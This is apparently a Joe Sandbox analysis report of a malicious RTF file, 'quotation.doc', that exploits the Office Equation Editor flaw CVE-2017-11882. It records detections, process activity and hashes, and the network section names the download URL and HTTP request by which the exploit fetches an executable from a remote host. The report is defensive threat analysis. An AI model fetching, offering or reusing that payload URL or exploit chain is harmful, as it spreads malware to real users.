Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
quotation.doc

Overview

General Information

Sample Name:quotation.doc
Analysis ID:1308372
MD5:290fce33014ad508c6a7e7cf17c2e991
SHA1:beb0df0e8d7344d428ec63b7f820be08c50ad76a
SHA256:241367cd4f08afe3402847a7ecbc5c83f54d1c3c3693d00ea6a103d7ed597a9b
Tags:CVE-2017-11882docNanoCore
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Shellcode detected
Office equation editor establishes network connection
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3160 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 3244 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • EQNEDT32.EXE (PID: 3500 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
quotation.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x79:$obj2: \objdata
  • 0x5f:$obj3: \objupdate

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 141.8.197.42, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3244, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: quotation.docAvira: detected
Source: quotation.docReversingLabs: Detection: 51%
Source: quotation.docVirustotal: Detection: 64%Perma Link

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: unknown Port: 80Jump to behavior
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02B66C14 WinExec,ExitProcess,2_2_02B66C14
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02B66B4A LoadLibraryW,URLDownloadToFileW,2_2_02B66B4A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02B66BC9 URLDownloadToFileW,2_2_02B66BC9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02B66C34 ExitProcess,2_2_02B66C34
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02B66B64 URLDownloadToFileW,2_2_02B66B64
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02B66AA1 ExitProcess,2_2_02B66AA1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02B66AD6 URLDownloadToFileW,2_2_02B66AD6
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global trafficTCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global trafficTCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global trafficTCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global trafficTCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163
Source: global trafficDNS query: name: a0862680.xsph.ru
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global trafficHTTP traffic detected: GET /djlipantro2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: a0862680.xsph.ruConnection: Keep-Alive
Source: EQNEDT32.EXE, 00000002.00000002.341724757.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a0862680.xsph.ru/djlipantro2.1.exe
Source: EQNEDT32.EXE, 00000002.00000002.341724757.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a0862680.xsph.ru/djlipantro2.1.exeinU
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BB1AFCA5-5498-40FF-BC14-3D4DF358421D}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: a0862680.xsph.ru
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02B66B4A LoadLibraryW,URLDownloadToFileW,2_2_02B66B4A
Source: global trafficHTTP traffic detected: GET /djlipantro2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: a0862680.xsph.ruConnection: Keep-Alive

System Summary

barindex
Source: quotation.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: quotation.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 771D0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 771D0000 page execute and read and writeJump to behavior
Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: quotation.docReversingLabs: Detection: 51%
Source: quotation.docVirustotal: Detection: 64%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: quotation.LNK.0.drLNK file: ..\..\..\..\..\Desktop\quotation.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$otation.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6103.tmpJump to behavior
Source: classification engineClassification label: mal80.expl.winDOC@3/7@1/1
Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: quotation.docStatic file information: File size 1104718 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02AF4E19 push cs; iretd 2_2_02AF4E1F
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3264Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3520Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_02B66C3B mov edx, dword ptr fs:[00000030h]2_2_02B66C3B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scripting
Path Interception1
Process Injection
1
Masquerading
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
Non-Application Layer Protocol
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts13
Exploitation for Client Execution
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager3
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Ingress Tool Transfer
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Scripting
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
quotation.doc51%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
quotation.doc100%AviraTR/AVF.Agent.tcybl
quotation.doc64%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
a0862680.xsph.ru
141.8.197.42
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    http://a0862680.xsph.ru/djlipantro2.1.exefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://a0862680.xsph.ru/djlipantro2.1.exeinUEQNEDT32.EXE, 00000002.00000002.341724757.000000000060F000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        141.8.197.42
        a0862680.xsph.ruRussian Federation
        35278SPRINTHOSTRUfalse
        Joe Sandbox Version:38.0.0 Beryl
        Analysis ID:1308372
        Start date and time:2023-09-14 23:10:49 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 4m 0s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:quotation.doc
        Detection:MAL
        Classification:mal80.expl.winDOC@3/7@1/1
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 7
        • Number of non-executed functions: 1
        Cookbook Comments:
        • Found application associated with file extension: .doc
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Active ActiveX Object
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 72.21.81.240
        • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        23:11:34API Interceptor275x Sleep call for process: EQNEDT32.EXE modified
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):573440
        Entropy (8bit):0.021820244057429588
        Encrypted:false
        SSDEEP:6:rl912N0xs+CFQXCB9Xh9Xh9XFUTPgqlS81:rl3lKFQCb77FUTPgeS0
        MD5:EB1621597982F3D792EE60D683C8E179
        SHA1:F3B964FDF69807CD408B8169FC02D6AB735714E7
        SHA-256:A937454D6E3EF14D76D93BD3627479D721BF3A3219ED2948E42B2E18C4906C14
        SHA-512:02535559F0A95FFCDE7340E6DE61E01E1839D3FFB153AFD2BFCBEF76DC2717900D0774F713732E5C3475259E6949EBB915853B735E8390BCD2E7BC7C8A445D9B
        Malicious:false
        Reputation:low
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.9566367088712961
        Encrypted:false
        SSDEEP:6:uNgREqAWlgFJmQDlll8vlwlNB9lFwQFrB:ak5uFJmQ7uvqlNLlKQZB
        MD5:79D738CF3B8ED684C4A8BB195E245A30
        SHA1:BFA23101855A6FEAD977FDDA92240DA4A71A08B4
        SHA-256:C39A69B9C528188A630A2E9B22361D6B40A722AFD6FDEEA97FE0AC654637DF92
        SHA-512:E7B5DAFE32CDF2C345127AD39AFB58C67A3207563AC0B38909BFFFCD30DCE35D63992ED48E5BA7C84CF0F578478982D83226378605044442241E333AFEA68D10
        Malicious:false
        Reputation:low
        Preview:..................8.5.4.5.4.3.5.2.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.........................................................................................................................................................................................................................................................................................................................................................................................................................................................$...&...,...............................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j...h...CJ..OJ..QJ..U..^J..aJ.
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Reputation:low
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Generic INItialization configuration [folders]
        Category:dropped
        Size (bytes):52
        Entropy (8bit):4.402174814211727
        Encrypted:false
        SSDEEP:3:M1EyDFSm4XDFSv:MyyhShc
        MD5:1235F4663AA772DEFB0094B458773BFA
        SHA1:1550C6ABAB4896BB8E239CD274C3BBB87F023728
        SHA-256:A9EED9BF8247648A5F86BF0D7915E2E2F442EDBC64993200858643ECB20E5948
        SHA-512:5A1EC21A2218C430181892A01774849021C7558D93483153729A408412FE6A9F14C141D14CBE21E0FA257CB0B91BD9297A07582BDAE70CCFA643962C502D24A2
        Malicious:false
        Reputation:low
        Preview:[doc]..quotation.LNK=0..[folders]..quotation.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:02 2023, mtime=Fri Aug 11 15:42:02 2023, atime=Thu Sep 14 20:11:32 2023, length=1104718, window=hide
        Category:dropped
        Size (bytes):1009
        Entropy (8bit):4.538690829355147
        Encrypted:false
        SSDEEP:12:8CFRgXg/XAlCPCHaXhzBMzB/J89rX+W1UziJlNCktKicvbLIlL8GADtZ3YilMME1:84/XTxzyc9j+iJ1reXIlLoDv3qqk7N
        MD5:3C0ABAB6844F6D533A21AD7E90F370E3
        SHA1:7E2E29CA3909AC767790D5EA2F60E777FACF9BC1
        SHA-256:CF40CACBB80C51DE1C658982AC4E524F31D9E1B267F2D282AF9FE1C8B6D34C55
        SHA-512:83087A082410CF436475C1124E3742DC7C9674D4CECA160D11D627131CD544E76792B6111DA7A41551AF54F0DE1D651C3D8750B8A6FCA07D2B47046D233E2F21
        Malicious:false
        Reputation:low
        Preview:L..................F.... ....fm.r....fm.r....O..P...N............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......WB...user.8......QK.X.WB.*...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.N....Wq. .QUOTAT~1.DOC..H.......WB..WB.*.........................q.u.o.t.a.t.i.o.n...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop\quotation.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.q.u.o.t.a.t.i.o.n...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......928100..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8...8.
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
        MD5:EB62D355909FD3DD98A808A4D456667D
        SHA1:71A4875D461DDDB4D9EFA05E2529D67E79E558C2
        SHA-256:4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
        SHA-512:542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
        Malicious:false
        Reputation:low
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
        MD5:EB62D355909FD3DD98A808A4D456667D
        SHA1:71A4875D461DDDB4D9EFA05E2529D67E79E558C2
        SHA-256:4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
        SHA-512:542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
        Malicious:false
        Reputation:low
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        File type:Rich Text Format data, version 1
        Entropy (8bit):4.001133123215097
        TrID:
        • Rich Text Format (5005/1) 55.56%
        • Rich Text Format (4004/1) 44.44%
        File name:quotation.doc
        File size:1'104'718 bytes
        MD5:290fce33014ad508c6a7e7cf17c2e991
        SHA1:beb0df0e8d7344d428ec63b7f820be08c50ad76a
        SHA256:241367cd4f08afe3402847a7ecbc5c83f54d1c3c3693d00ea6a103d7ed597a9b
        SHA512:3b895d26fb84d530f8336325f3732016831c908053016e53ee52e63f970075e855c06c031c4efdf6e359466676178daf2767709be412cbed7bd5ba0b312ec6ed
        SSDEEP:24576:vfEkPFVyCRA+aV9Y72BMAuoozsJnwbnDvg0P2o0FNfYsDvmLTq:U
        TLSH:A935BFF876047DD62A6F136BCA96ACDD13B61A639ACBA4CD806477C305A3375FE02C05
